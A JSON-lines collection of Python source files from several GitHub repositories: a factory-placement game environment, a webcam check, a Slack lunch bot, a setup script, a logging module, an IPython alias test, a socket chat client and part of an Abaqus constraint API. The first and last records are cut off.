building):\n \"\"\"Check whether a building that is not yet part of the enviornment has a valid position\n\n Args:\n building (Building): Factory, Deposit, Obstacle, ...\n\n Returns:\n bool: validity of the position\n \"\"\"\n assert building not in self.buildings\n\n if self.is_out_off_bounds(building):\n return False\n if self.intersects_with_building(building):\n return False\n if self.violates_legal_connection(building):\n return False\n if self.violates_single_input(building):\n return False\n # technically not illegal, but very dumb move!\n if self.creates_connection_loop(building):\n return False\n return True\n\n def coords_out_off_bounds(self, x, y):\n if y < 0 or y >= self.height or x < 0 or x >= self.width:\n return True\n return False\n\n def is_tile_empty(self, x, 
y):\n if self.coords_out_off_bounds(x, y) or self.grid[y, x] != \" \":\n return False\n return True\n\n def is_out_off_bounds(self, building):\n # iterate over non-empty elements of the building\n for (tile_x, tile_y, element) in iter(building):\n if self.coords_out_off_bounds(tile_x, tile_y):\n return True\n return False\n\n def get_coords_around_position(self, x, y):\n top = x, y - 1\n right = x + 1, y\n bottom = x, y + 1\n left = x - 1, y\n return (top, right, bottom, left)\n\n def get_adjacent_positions(self, positions, empty_only=False):\n \"\"\"returns all coordinates adjacent to a list of positions.\n Use empty_only=True to filter out non-empty tiles.\n\n Args:\n positions (List((x, y)), or (x, y)): a list of multiple positions or a single (x, y) tuple\n empty_only (bool, optional): if True: only empty adjacent positions are returned. Defaults to False.\n\n Returns:\n List((x, y)): adjacent positions\n \"\"\"\n if type(positions) == tuple:\n return self.get_adjacent_positions([positions])\n\n adjacent_positions = []\n for x, y in positions:\n for adjacent_x, adjacent_y in self.get_coords_around_position(x, y):\n if not empty_only or self.is_tile_empty(adjacent_x, adjacent_y):\n adjacent_positions.append((adjacent_x, adjacent_y))\n return adjacent_positions\n\n def intersects_with_building(self, building):\n for (tile_x, tile_y, element) in iter(building):\n if not self.is_tile_empty(tile_x, tile_y):\n if self.conveyor_tunneling(tile_x, tile_y, element):\n continue\n return True\n return False\n\n def conveyor_tunneling(self, tile_x, tile_y, element):\n if element in [\"<\", \">\", \"^\", \"v\"]:\n if not self.coords_out_off_bounds(tile_x, tile_y):\n if self.grid[tile_y, tile_x] in [\"<\", \">\", \"^\", \"v\"]:\n return True\n return False\n\n def violates_legal_connection(self, building):\n for other_building in self.buildings:\n if self.would_connect_to(building, other_building):\n if type(other_building) not in LEGAL_CONNECTIONS[type(building)]:\n return True\n if self.would_connect_to(other_building, building):\n if type(building) not in LEGAL_CONNECTIONS[type(other_building)]:\n return True\n return False\n\n def violates_single_input(self, building):\n outgoing_connections = 0\n for other_building in self.buildings:\n if self.would_connect_to(building, other_building):\n outgoing_connections += 1\n elif self.would_connect_to(other_building, building):\n for connection in other_building.connections:\n if self.is_diagonal_input(connection, building):\n return True\n elif self.is_opposite_input(connection, building):\n return True\n\n if outgoing_connections > 1:\n return True\n return False\n\n def is_diagonal_input(self, building1, building2):\n inp1 = building1.get_input_positions()[0]\n inp2 = building2.get_input_positions()[0]\n\n x_diff, y_diff = inp1 - inp2\n return True if abs(x_diff) == 1 and abs(y_diff) == 1 else False\n\n def is_opposite_input(self, building1, building2):\n input1 = building1.get_input_positions()\n input2 = building2.get_input_positions()\n\n for inp1 in input1:\n for inp2 in input2:\n x_diff, y_diff = diff = inp1 - inp2\n\n if abs(x_diff) == 2 and abs(y_diff) == 0:\n x, y = inp1 - (diff // 2)\n if self.grid[(y, x)] == \"-\":\n return True\n elif abs(x_diff) == 0 and abs(y_diff) == 2:\n x, y = inp1 - (diff // 2)\n if self.grid[(y, x)] == \"-\":\n return True\n return False\n\n def creates_connection_loop(self, building):\n for other_building in self.buildings:\n if self.would_connect_to(building, other_building):\n if 
self.would_connect_to(other_building, building):\n return True\n return False\n\n def get_adjacent_inputs(self, x, y):\n return self.get_adjacent_elements(x, y, \"+\")\n\n def get_adjacent_outputs(self, x, y):\n return self.get_adjacent_elements(x, y, \"-\")\n\n def get_adjacent_elements(self, x, y, element):\n adjacent_positions = []\n for adjacent_x, adjacent_y in self.get_coords_around_position(x, y):\n if self.coords_out_off_bounds(adjacent_x, adjacent_y):\n continue\n if self.grid[adjacent_y, adjacent_x] == element:\n adjacent_positions.append((adjacent_x, adjacent_y))\n\n return adjacent_positions\n\n def get_min_distance(self, output_building, input_building):\n min_distance = None\n for out_x, out_y in output_building.get_output_positions():\n for in_x, in_y in input_building.get_input_positions():\n distance = self.get_tile_distance(out_x, out_y, in_x, in_y)\n if min_distance is None or distance < min_distance:\n min_distance = distance\n return min_distance\n\n def get_tile_distance(self, x1, y1, x2, y2):\n return abs(x1 - x2) + abs(y1 - y2)\n\n def would_connect_to(self, output_building, input_building):\n \"\"\"tests whether output_building's outputs can connect to input_building's inputs.\n buildings need not to be part of the environment.\n\n Args:\n output_building (building): building with outgoing connections\n input_building (building): building with incoming connections\n\n Returns:\n bool: True iff buildings output/input are adjacent\n \"\"\"\n return self.get_min_distance(output_building, input_building) == 1\n\n def is_connected(self, output_building, input_building, visited_buildings=[]):\n \"\"\"tests whether output_building is connected to input_building via other buildings\n Automatically checks for connection loops\n\n Args:\n output_building (building): building with outgoing connections\n input_building (building): building with incoming connections\n\n Returns:\n bool: True iff buildings are connected\n \"\"\"\n\n for next_building in output_building.connections:\n if next_building == input_building:\n return True\n elif next_building not in visited_buildings and self.is_connected(\n next_building, input_building, visited_buildings + [output_building]\n ):\n return True\n return False\n\n def get_deposits(self, subtype=None):\n return self.get_all_building_types(Deposit, subtype)\n\n def get_factories(self, subtype=None):\n return self.get_all_building_types(Factory, subtype)\n\n def get_all_building_types(self, building_cls, subtype=None):\n if subtype is None:\n return [b for b in self.buildings if type(b) == building_cls]\n return [\n b\n for b in self.buildings\n if type(b) == building_cls and b.subtype == subtype\n ]\n\n def get_possible_factories(self, subtype, max=10):\n factories = []\n for y in range(self.height):\n for x in range(self.width):\n factory = Factory((x, y), subtype)\n if self.is_legal_position(factory):\n factories.append(factory)\n\n random.shuffle(factories)\n return factories[:max]\n\n def get_possible_mines(self, deposit, factory=None, max=10):\n mines = []\n\n out_positions = deposit.get_output_positions()\n for x, y in self.get_adjacent_positions(out_positions, empty_only=True):\n for BuildingClass in LEGAL_CONNECTIONS[type(deposit)]:\n for subtype in range(BuildingClass.NUM_SUBTYPES):\n building = BuildingClass.from_input_position(x, y, subtype)\n if self.is_legal_position(building):\n mines.append(building)\n\n random.shuffle(mines)\n mines = mines[:max]\n if factory:\n mines = sorted(mines, key=lambda m: self.get_min_distance(m, 
factory))\n        return mines\n\n    def make_untargetable(self, false_targets):\n        for false_target in false_targets:\n            for x, y in false_target.get_input_positions():\n                self.grid[(y, x)] = \"#\"\n\n    def make_targetable(self, true_targets):\n        for true_target in true_targets:\n            for x, y in true_target.get_input_positions():\n                self.grid[(y, x)] = \"+\"\n\n    def from_json_file(self, filename):\n        with open(filename) as f:\n            task = json.load(f)\n\n        return self.from_json(task)\n\n    def from_json(self, task):\n        self.width = task[\"width\"]\n        self.height = task[\"height\"]\n        self.turns = task[\"turns\"]\n        self.products = task[\"products\"]\n        if \"time\" in task:\n            self.time = task[\"time\"]\n\n        self.empty()\n\n        for obj in task[\"objects\"]:\n            classname = obj[\"type\"].capitalize()\n            args = []\n            args.append((obj[\"x\"], obj[\"y\"]))\n\n            if \"subtype\" not in obj:\n                args.append(0)\n            else:\n                args.append(obj[\"subtype\"])\n            if \"width\" in obj:\n                args.extend([obj[\"width\"], obj[\"height\"]])\n\n            building = globals()[classname](*args)\n            self.add_building(building, force=True)\n\n    def __str__(self):\n        \"\"\"printable representation;\n        displayed as an ASCII grid and possibly additional information like #turns, products, ...\n\n        Returns:\n            str: string representation of the environment\n        \"\"\"\n        return f\"\\n{self.grid}\\n\".replace(\"'\", \"\")\n","repo_name":"tarexo/informaticup-profit","sub_path":"src/environment/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":14903,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"}
+{"seq_id":"74555527439","text":"# !interpreter [optional-arg]\n# -*- coding: utf-8 -*-\n# Version \n\n\"\"\"\n{\n    Only to display the Webcam frames, for preparation\n}\n{License_info}\n\"\"\"\n\n# Futures\n# […]\n\n# Built-in/Generic Imports\nimport os\nimport sys\n# […]\n\n# Libs\nimport cv2\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n    # Capture frame-by-frame\n    ret, frame = cap.read()\n\n    # Display the resulting frame\n    cv2.imshow('frame',frame)\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n# […]\n\n# Own modules\n# from {path} import {class}\n# […]\n\n","repo_name":"zhajkun/Human_Action_Recognition","sub_path":"tools/Check_Webcam.py","file_name":"Check_Webcam.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"}
+{"seq_id":"35381234384","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nimport sys\nfrom random import sample\nimport json\n\nfile_path = os.path.realpath(__file__)\ndirectory_path = os.path.dirname(file_path)\nsys.path.append(os.path.join(directory_path, '../../src/lib'))\nsys.path.append(os.path.join(directory_path, '../../src/pf'))\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom slack_notify import send_slack_message_by_message_body\n\nscope = [\n'https://spreadsheets.google.com/feeds',\n'https://www.googleapis.com/auth/drive',\n]\njson_file_name = f'''{directory_path}/spreadsheet_access_key.json''' # json key file issued by the Google API\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(json_file_name, scope)\ngc = gspread.authorize(credentials)\nspreadsheet_url = '구글시트 공유 url 삽입'\ndoc = gc.open_by_url(spreadsheet_url)\nworksheet = doc.worksheet('시트명')\n\n# fetch every row from the spreadsheet\nlist_of_lists = worksheet.get_all_values()\n\n# simply pick 3 random rows, without duplicates\nidx1, idx2, idx3 = sample(range(1, len(list_of_lists)-1), 3)\n\nmenu_list = []\nmenu_list.append(list_of_lists[idx1])\nmenu_list.append(list_of_lists[idx2])\nmenu_list.append(list_of_lists[idx3])\n\nslack_url = 'https://hooks.slack.com/services/웹훅주소' \n\ntext_list = []\nfor menu in menu_list:\n    # columns: restaurant name / menu / price\n    restaurant = menu[0]\n    menu_name = menu[1]\n    price = menu[2]\n    text = f'- {restaurant} / *{menu_name}* / {price}원'\n    text_list.append(text)\ntext_list_str = '\\n'.join(text_list)\n\n\n# build the message body: https://app.slack.com/block-kit-builder/TVBAZBQJJ\nslack_body = {\n\t\"blocks\": [\n\t\t{\n\t\t\t\"type\": \"header\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\"text\": \"오늘의 메뉴 예언\",\n\t\t\t\t\"emoji\": True\n\t\t\t}\n\t\t},\n\t\t{\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": text_list_str\n\t\t\t},\n\t\t\t\"accessory\": {\n\t\t\t\t\"type\": \"image\",\n\t\t\t\t\"image_url\": \"https://pds.joins.com/news/component/joongang_sunday/2011/10/08212015.jpg\",\n\t\t\t\t\"alt_text\": \"alt text for image\"\n\t\t\t}\n\t\t},\n\t\t{\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": \"맛집 정보 추가하기 :point_right::skin-tone-2::point_right::skin-tone-2:\"\n\t\t\t},\n\t\t\t\"accessory\": {\n\t\t\t\t\"type\": \"button\",\n\t\t\t\t\"text\": {\n\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\"text\": \"맛집 목록\",\n\t\t\t\t\t\"emoji\": True\n\t\t\t\t},\n\t\t\t\t\"value\": \"click_me_123\",\n\t\t\t\t\"url\": spreadsheet_url,\n\t\t\t\t\"action_id\": \"button-action\"\n\t\t\t}\n\t\t},\n\t\t{\n\t\t\t\"type\": \"divider\"\n\t\t}\n\t]\n}\n\n# send to Slack\nsend_slack_message_by_message_body(slack_url, json.dumps(slack_body))\n","repo_name":"kym9129/LunchBot","sub_path":"src/lunchbot/lunchbot.py","file_name":"lunchbot.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"}
+{"seq_id":"32889129536","text":"from distutils.core import setup, Extension\nimport sysconfig\n\ndef main():\n    CFLAGS = ['-march=native', '-O3', '-pthread', '-Wall']\n\n    module = Extension('fot_planner',\n                        sources = ['planner_package.cpp', 'AnytimeFrenetPlanner.cpp'],\n                        extra_compile_args = CFLAGS)\n\n    setup(name=\"fot_planner\",\n          version=\"1.0.0\",\n          description=\"FOT Planner\",\n          author=\"ERDOS Project\",\n          ext_modules=[module])\n\nif __name__ == \"__main__\":\n    main()","repo_name":"simonguozirui/c-python-planner","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"26172944741","text":"\"\"\"Global console module.\"\"\"\n\nimport logging\n\nfrom rich.console import Console\nfrom rich.logging import RichHandler\n\n\ndef init_console() -> Console:\n    \"\"\"Initialize console.\n\n    Returns:\n        Console: Console object.\n    \"\"\"\n    return Console()\n\n\ndef init_logger():\n    \"\"\"Initialize logger.\"\"\"\n    logging.basicConfig(\n        level=logging.getLevelName('INFO'),\n        format='%(message)s',\n        datefmt='[%X]',\n        handlers=[RichHandler()],\n    )\n\n\ninit_logger()\nconsole = init_console()\n","repo_name":"ngngardner/traffic_sim","sub_path":"traffic_sim/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"74439188559","text":"from IPython.utils.capture import capture_output\n\nimport nose.tools as nt\n\ndef 
test_alias_lifecycle():\n    name = 'test_alias1'\n    cmd = 'echo \"Hello\"'\n    am = _ip.alias_manager\n    am.clear_aliases()\n    am.define_alias(name, cmd)\n    assert am.is_alias(name)\n    nt.assert_equal(am.retrieve_alias(name), cmd)\n    nt.assert_in((name, cmd), am.aliases)\n    \n    # Test running the alias\n    orig_system = _ip.system\n    result = []\n    _ip.system = result.append\n    try:\n        _ip.run_cell('%{}'.format(name))\n        result = [c.strip() for c in result]\n        nt.assert_equal(result, [cmd])\n    finally:\n        _ip.system = orig_system\n    \n    # Test removing the alias\n    am.undefine_alias(name)\n    assert not am.is_alias(name)\n    with nt.assert_raises(ValueError):\n        am.retrieve_alias(name)\n    nt.assert_not_in((name, cmd), am.aliases)\n    \n\ndef test_alias_args_error():\n    \"\"\"Error expanding with wrong number of arguments\"\"\"\n    _ip.alias_manager.define_alias('parts', 'echo first %s second %s')\n    # capture stderr:\n    with capture_output() as cap:\n        _ip.run_cell('parts 1')\n\n    nt.assert_equal(cap.stderr.split(':')[0], 'UsageError')","repo_name":"khanhnamle1994/natural-language-processing","sub_path":"assignment1/.env/lib/python2.7/site-packages/IPython/core/tests/test_alias.py","file_name":"test_alias.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"29"}
+{"seq_id":"42085392351","text":"#!/usr/bin/python3\n# _*_coding:utf-8_*_\n'''\nThis is the Micro Q client\nKey techniques:\n    1. tkinter interface\n    2. class encapsulation\n    3. threads\n    4. wx-module graphical user interface\n    5. messages are sent in json format\n'''\n# import the required modules\nfrom socket import *\nfrom threading import Thread\nimport wx\nimport os\nfrom tkinter import filedialog\nimport tkinter\nimport json\nimport wx.lib.agw.customtreectrl as CT\n\nroot = tkinter.Tk()\nroot.withdraw()  # **** hide the main tkinter window\n\n\n# define the class, inheriting from wx.Frame\nclass QICQ(wx.Frame):\n    # initialisation: define some attributes and widgets\n    def __init__(self):\n        global serverIp, serverPort\n        serverPort = 6789\n        serverIp = '127.0.0.1'\n\n        # initialise window properties (background colour, buttons, size, position) and the thread\n\n        # set up the main window; the superclass is initialised here\n        wx.Frame.__init__(self, parent=None, title='micro_Q', size=(600, 400))\n        # create an auto-resizing panel\n        panel = wx.Panel(self)\n        panel.SetBackgroundColour((0, 153, 255))\n\n        # flags recording whether a file has been chosen\n        self.isChoosedFile = False\n        self.dataOfChoosedFile = None\n        self.fileName = None\n\n        # user section\n        # tree control for selecting all users or a single one\n        self.UserListTree = CT.CustomTreeCtrl(parent=panel, pos=(10, 10), size=(280, 300),\n                                              style=wx.TR_FULL_ROW_HIGHLIGHT)\n        # create the root node; the argument is the root's label\n        self.rootID = self.UserListTree.AddRoot(\"已登录用户\")\n        # set the background colour\n        self.UserListTree.SetBackgroundColour((224, 255, 255))\n        # add child nodes\n        self.UserListTree.AppendItem(self.rootID, '第一个子节点')\n        self.UserListTree.AppendItem(self.rootID, '第二个子节点')\n        # expand all nodes\n        self.UserListTree.ExpandAll()\n        self.UserList = []\n        # build the info button\n        self.info = wx.Button(parent=panel, pos=(100, 315), size=(80, 40), label=\"说明\")\n        # set the background colour\n        self.info.SetBackgroundColour((224, 255, 255))\n\n        # operation section\n        # text input box\n        # create the text control and set the foreground (text) colour\n        inputTip = wx.TextCtrl(parent=panel, pos=(300, 10), size=(130, 20), value=\"请输入你要发送的信息\", style=wx.TE_READONLY)\n        # set the background colour\n        inputTip.SetBackgroundColour((224, 255, 255))\n        # input box\n        self.input = wx.TextCtrl(parent=panel, pos=(300, 30), size=(130, 50))\n        self.input.SetForegroundColour((0, 153, 255))\n        self.input.SetBackgroundColour((224, 255, 255))\n\n        # file chooser button\n        self.fileChooser = wx.Button(parent=panel, pos=(440, 10), size=(130, 70), label=\"选择文件\")\n        self.fileChooser.SetBackgroundColour((224, 255, 255))\n\n        # send button\n        self.send = wx.Button(parent=panel, pos=(300, 100), size=(275, 50), label=\"发送\")\n        self.send.SetBackgroundColour((224, 255, 255))\n        # middle separator line\n        separation = wx.TextCtrl(parent=panel, pos=(290, 170), size=(300, 2))\n        separation.SetBackgroundColour((224, 255, 255))\n        # received-messages box\n        receivedTip = wx.TextCtrl(parent=panel, pos=(300, 190), size=(135, 20), value=\"发送/接收到的消息列表\",\n                                  style=wx.TE_READONLY)\n        receivedTip.SetForegroundColour((0, 153, 255))\n        receivedTip.SetBackgroundColour((224, 255, 255))\n        # set the text box's scrolling style\n        self.messageList = wx.TextCtrl(parent=panel, size=(275, 120), pos=(300, 210),\n                                       style=(wx.TE_MULTILINE | wx.HSCROLL | wx.TE_READONLY))\n        self.messageList.SetBackgroundColour((224, 255, 255))\n        self.messageList.SetForegroundColour((0, 153, 255))\n\n        # message to be sent; define its initial value\n        self.sendMessage = ''\n\n        # create the worker thread\n        childThraed = Thread(target=self.socketHander)\n        childThraed.setDaemon(True)\n        childThraed.start()\n\n        # bind button events\n        self.Bind(wx.EVT_BUTTON, self.OnInfoClicked, self.info)\n        self.Bind(wx.EVT_BUTTON, self.OnSendClicked, self.send)\n        self.Bind(wx.EVT_BUTTON, self.OnFileChooseClicked, self.fileChooser)\n\n    # handler for the info button\n    def OnInfoClicked(self, event):\n        wx.MessageDialog(self, u'''\\r\\n\\r\\n\\r\\n\\t\\t1、互联的环境必须是在同一个局域网\\r\\n\n        2、必须先在左边选择发送对象且发送消息不为空才能发送消息\\r\\n\n        3、选择根目录{已登录用户}是群发消息,选择单个是私发消息\\r\\n\n        4、刚登录时最后一个ip是你自己的ip\\r\\n''', u\"警告\", wx.OK).ShowModal()\n\n    # handle the send button\n    def OnSendClicked(self, event):\n        # read the value typed into the input box\n        self.sendMessage = self.input.Value\n        # warn if there is no input and no file has been chosen\n        if len(self.sendMessage) == 0 and self.isChoosedFile == False:\n            wx.MessageDialog(self, u\"请先输入(选择)待发送的消息(文件)\", u\"警告\", wx.OK).ShowModal()\n            return None\n        # the selected recipient\n        selected = self.UserListTree.GetSelection()\n        selected = self.UserListTree.GetItemText(selected)\n        # warn if no user has been selected\n        if not selected:\n            wx.MessageDialog(self, u\"请先选择用户或组\", u\"警告\", wx.OK).ShowModal()\n            return None\n\n        # if the root node is selected, broadcast to the group\n        if selected == \"已登录用户\":\n            # no file chosen\n            if self.isChoosedFile == False:\n                self.sendMessage = {\n                    \"type\": \"2\",\n                    \"sourceIP\": self.ip,\n                    \"destinationIP\": selected,\n                    \"content\": self.sendMessage\n                }\n            # a file was chosen\n            else:\n                self.sendMessage = {\n                    \"type\": \"5\",\n                    \"sourceIP\": self.ip,\n                    \"destinationIP\": selected,\n                    \"filename\": self.fileName,\n                    \"content\": self.dataOfChoosedFile\n                }\n        # otherwise, forward to a single user\n        else:\n            if self.isChoosedFile == False:\n                self.sendMessage = {\n                    \"type\": \"1\",\n                    \"sourceIP\": self.ip,\n                    \"destinationIP\": selected,\n                    \"content\": self.sendMessage\n                }\n            else:\n                self.sendMessage = {\n                    \"type\": \"4\",\n                    \"sourceIP\": self.ip,\n                    \"destinationIP\": selected,\n                    \"filename\": self.fileName,\n                    \"content\": self.dataOfChoosedFile\n                }\n\n    # handle the file-chooser button\n    def OnFileChooseClicked(self, event):\n        filepath = filedialog.askopenfilename(title=\"请选择要发送的文件\")\n        if len(filepath) > 0:\n            filedicpath, fullflname = os.path.split(filepath)\n            self.fileName = fullflname\n            self.isChoosedFile = True\n            with open(filepath, \"r\") as f:\n                self.dataOfChoosedFile = f.read()\n\n            print(self.fileName)\n\n    # message send/receive handling\n    def socketHander(self):\n        self.clientSocket = socket(AF_INET, SOCK_STREAM)\n        self.clientSocket.connect((serverIp, serverPort))\n        self.clientSocket.settimeout(2)\n        self.ip, self.port = self.clientSocket.getsockname()\n        print(\"self ip\", self.ip)\n        while True:\n            # send messages\n            if len(self.sendMessage) == 0:\n                pass\n            else:\n                if self.isChoosedFile == True:\n                    self.clientSocket.send(json.dumps(self.sendMessage).encode(\"utf-8\"))\n                    self.messageList.AppendText(\"文件[\" + self.fileName + \"]发送成功\\r\\n\")\n                    self.fileName = None\n                    self.dataOfChoosedFile = None\n                    self.isChoosedFile = False\n                    self.sendMessage = \"\"\n\n                else:\n                    self.clientSocket.send(json.dumps(self.sendMessage).encode(\"utf-8\"))\n                    self.messageList.AppendText(\"消息[\" + self.sendMessage.get(\"content\") + \"]发送成功\\r\\n\")\n                    self.input.SetLabelText(\"\")\n                    self.sendMessage = \"\"\n\n            try:\n                # receive messages\n                receivedMessage = self.clientSocket.recv(1024)\n                receivedMessage = receivedMessage.decode(\"utf-8\")\n                receivedMessage = json.loads(receivedMessage)\n                print(receivedMessage)\n                type = receivedMessage.get(\"type\")\n\n                # the client receives a forwarded message from the server\n                if type == \"1\":\n                    print(\"客户端收到消息\")\n                    sourceIp = receivedMessage.get(\"sourceIP\")\n                    content = receivedMessage.get(\"content\")\n                    if sourceIp == self.ip:\n                        pass\n                    else:\n                        self.messageList.AppendText(\"来自:[\" + sourceIp + \"]的消息:[\" + content + \"]\\r\\n\")\n\n                elif type == \"2\":\n                    # the client receives a user-list refresh request from the server\n                    self.userList = receivedMessage.get(\"content\")\n                    self.setUserList()\n\n                elif type == \"3\":\n                    filename = receivedMessage.get(\"filename\")\n                    print(\"rrrr\", filename)\n                    with open(filename, \"w\") as f:\n                        f.write(receivedMessage.get(\"content\"))\n            except:\n                print(\"等待数据...\")\n                pass\n            pass\n\n    # populate the user list\n    def setUserList(self):\n        self.UserListTree.DeleteChildren(self.rootID)\n        for user in self.userList:\n            # if user == self.ip:\n            #     continue\n            self.UserListTree.AppendItem(self.rootID, user)\n        pass\n\n    # close\n    def OnClose(self, event):\n        endMessage = {\n            \"type\": \"3\",\n            \"content\": \"bye\"\n        }\n        self.clientSocket.send(json.dumps(endMessage).encode(\"utf-8\"))\n        self.Destroy()\n\n\nif __name__ == '__main__':\n    global serverIp\n    serverIp = input(\"请输入服务器ip\")\n    app = wx.App()\n    frame = QICQ()\n    # frame.Bind(wx.EVT_CLOSE, frame.OnClosed)\n    frame.Show()\n    app.MainLoop()\n    app.OnExit()\n","repo_name":"somebady111/micro-Q","sub_path":"micro Q-cilent.py","file_name":"micro Q-cilent.py","file_ext":"py","file_size_in_byte":10615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"17145797106","text":"from __future__ import annotations\n\nfrom typing import Union\n\nfrom typing_extensions import Literal\n\nfrom abqpy.decorators import abaqus_class_doc, abaqus_method_doc\n\nfrom ..Assembly.PartInstance import PartInstance\nfrom ..BasicGeometry.ModelDotArray import ModelDotArray\nfrom ..Model.ModelBase import ModelBase\nfrom ..Region.Region import Region\nfrom ..UtilityAndView.abaqusConstants import (\n    BOTH,\n    COMPUTED,\n    DEFAULT,\n    DOF_MODE_MPC,\n    OFF,\n    ON,\n    SOLVER_DEFAULT,\n    UNIFORM,\n    Boolean,\n)\nfrom ..UtilityAndView.abaqusConstants import abaqusConstants as C\nfrom .AdjustPoints import AdjustPoints\nfrom .Coupling import Coupling\nfrom .DisplayBody import DisplayBody\nfrom .EmbeddedRegion import EmbeddedRegion\nfrom .Equation import Equation\nfrom .MultipointConstraint import MultipointConstraint\nfrom .RigidBody import RigidBody\nfrom .ShellSolidCoupling import ShellSolidCoupling\nfrom .Tie import Tie\n\n\n@abaqus_class_doc\nclass ConstraintModel(ModelBase):\n    \"\"\"Abaqus creates a Model object named `Model-1` when a session is started.\n\n    .. note::\n        This object can be accessed by::\n\n            mdb.models[name]\n    \"\"\"\n\n    @abaqus_method_doc\n    def AdjustPoints(self, name: str, surface: Region, controlPoints: Region) -> AdjustPoints:\n        \"\"\"This method creates an AdjustPoints object.\n\n        .. 
note::\n This function can be accessed by::\n\n mdb.models[name].AdjustPoints\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n surface\n A Region object specifying the surface to which the **controlPoints** are adjusted.\n controlPoints\n A Region object specifying the constraint control points.\n\n Returns\n -------\n AdjustPoints\n An AdjustPoints object.\n \"\"\"\n self.constraints[name] = constraint = AdjustPoints(name, surface, controlPoints)\n return constraint\n\n @abaqus_method_doc\n def Coupling(\n self,\n name: str,\n surface: Region,\n controlPoint: Region,\n influenceRadius: Union[Literal[C.WHOLE_SURFACE], float],\n couplingType: Literal[C.STRUCTURAL, C.DISTRIBUTING, C.KINEMATIC],\n adjust: Boolean = OFF,\n localCsys: str | None = None,\n u1: Boolean = ON,\n u2: Boolean = ON,\n u3: Boolean = ON,\n ur1: Boolean = ON,\n ur2: Boolean = ON,\n ur3: Boolean = ON,\n weightingMethod: Literal[C.QUADRATIC, C.DISTRIBUTING, C.UNIFORM, C.LINEAR, C.CUBIC] = UNIFORM,\n alpha: float = 0.0,\n ) -> Coupling:\n \"\"\"This method creates a Coupling object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].Coupling\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n surface\n A Region object specifying the surface on which the coupling nodes are located.\n controlPoint\n A Region object specifying the constraint control point.\n influenceRadius\n The SymbolicConstant WHOLE_SURFACE or a Float specifying the influence radius.\n couplingType\n A SymbolicConstant specifying the coupling constraint type. Possible values are\n KINEMATIC, DISTRIBUTING, and STRUCTURAL.\n adjust\n A Boolean specifying if the control point will be adjusted (moved) to the surface. The\n point will be adjusted in the direction normal to the specified surface. The default\n value is OFF.\n localCsys\n None or a DatumCsys object specifying the initial orientation of the local coordinate\n system for the coupling's degrees of freedom. If **localCsys** = None, the coupling is\n defined in the global coordinate system. The default value is None.\n u1\n A Boolean specifying if the displacement component in the 1-direction is constrained to\n the reference node for a kinematic coupling constraint. The default value is ON.The **u1**\n argument applies only when **couplingType** = KINEMATIC.\n u2\n A Boolean specifying if the displacement component in the 2-direction is constrained to\n the reference node for a kinematic coupling constraint. The default value is ON.The **u2**\n argument applies only when **couplingType** = KINEMATIC.\n u3\n A Boolean specifying if the displacement component in the 3-direction is constrained to\n the reference node for a kinematic coupling constraint. The default value is ON.The **u3**\n argument applies only when **couplingType** = KINEMATIC.\n ur1\n A Boolean specifying if the rotational displacement component about the 1-direction is\n constrained to the reference node for a kinematic coupling constraint. The default value\n is ON.The **ur1** argument applies only when **couplingType** = KINEMATIC.\n ur2\n A Boolean specifying if the rotational displacement component about the 2-direction is\n constrained to the reference node for a kinematic coupling constraint. 
The default value\n is ON.The **ur2** argument applies only when **couplingType** = KINEMATIC.\n ur3\n A Boolean specifying if the rotational displacement component about the 3-direction is\n constrained to the reference node for a kinematic coupling constraint. The default value\n is ON.The **ur3** argument applies only when **couplingType** = KINEMATIC.\n weightingMethod\n A SymbolicConstant specifying an optional weighting method used for calculating the\n distributing weight factors. Possible values are UNIFORM, LINEAR, QUADRATIC, and CUBIC.\n The default value is UNIFORM.The **weightingMethod** argument applies only when\n **couplingType** = DISTRIBUTING.\n alpha\n A Float specifying the value of the thermal expansion coefficient. The default value is 0.0.\n The alpha argument applies only when couplingType=KINEMATIC.\n\n .. versionadded:: 2022\n The ``alpha`` argument was added.\n\n Returns\n -------\n Coupling\n A Coupling object.\n \"\"\"\n self.constraints[name] = constraint = Coupling(\n name,\n surface,\n controlPoint,\n influenceRadius,\n couplingType,\n adjust,\n localCsys,\n u1,\n u2,\n u3,\n ur1,\n ur2,\n ur3,\n weightingMethod,\n alpha,\n )\n return constraint\n\n @abaqus_method_doc\n def DisplayBody(self, name: str, instance: PartInstance, controlPoints: ModelDotArray) -> DisplayBody:\n \"\"\"This method creates a DisplayBody object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].DisplayBody\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n instance\n A PartInstance object specifying the part instance that is to be used for display only.\n controlPoints\n A ModelDotArray object specifying the motion of the PartInstance. The control points may\n be ConstrainedSketchVertex, ReferencePoint, or MeshNode objects. Their motion will control the motion 